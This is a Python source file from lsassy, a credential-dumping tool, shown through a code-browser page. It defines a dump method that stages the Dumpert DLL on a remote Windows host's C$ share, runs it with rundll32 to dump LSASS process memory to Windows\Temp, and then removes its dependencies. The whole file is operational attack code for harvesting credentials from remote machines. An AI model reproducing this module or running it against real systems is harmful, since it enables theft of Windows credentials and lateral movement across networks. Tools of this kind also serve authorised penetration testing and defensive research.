Codebase list python-lsassy / run/262a5a88-ec61-4bd1-a517-d414ea54fd3e/upstream lsassy / dumpmethod / dumpertdll.py
run/262a5a88-ec61-4bd1-a517-d414ea54fd3e/upstream

Tree @run/262a5a88-ec61-4bd1-a517-d414ea54fd3e/upstream (Download .tar.gz)

dumpertdll.py @run/262a5a88-ec61-4bd1-a517-d414ea54fd3e/upstreamraw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
"""
https://github.com/outflanknl/Dumpert
"""

from lsassy.dumpmethod import IDumpMethod, Dependency


class DumpMethod(IDumpMethod):
    custom_dump_path_support = False
    custom_dump_name_support = False

    dump_name = "dumpert.dmp"
    dump_share = "C$"
    dump_path = "\\Windows\\Temp\\"

    def __init__(self, session, timeout, time_between_commands):
        super().__init__(session, timeout, time_between_commands)
        self.dumpertdll = Dependency("dumpertdll", "dumpert.dll")

    def prepare(self, options):
        return self.prepare_dependencies(options, [self.dumpertdll])

    def clean(self):
        self.clean_dependencies([self.dumpertdll])

    def get_commands(self):
        cmd_command = """rundll32.exe {},Dump""".format(self.dumpertdll.get_remote_path())
        pwsh_command = cmd_command
        return {
            "cmd": cmd_command,
            "pwsh": pwsh_command
        }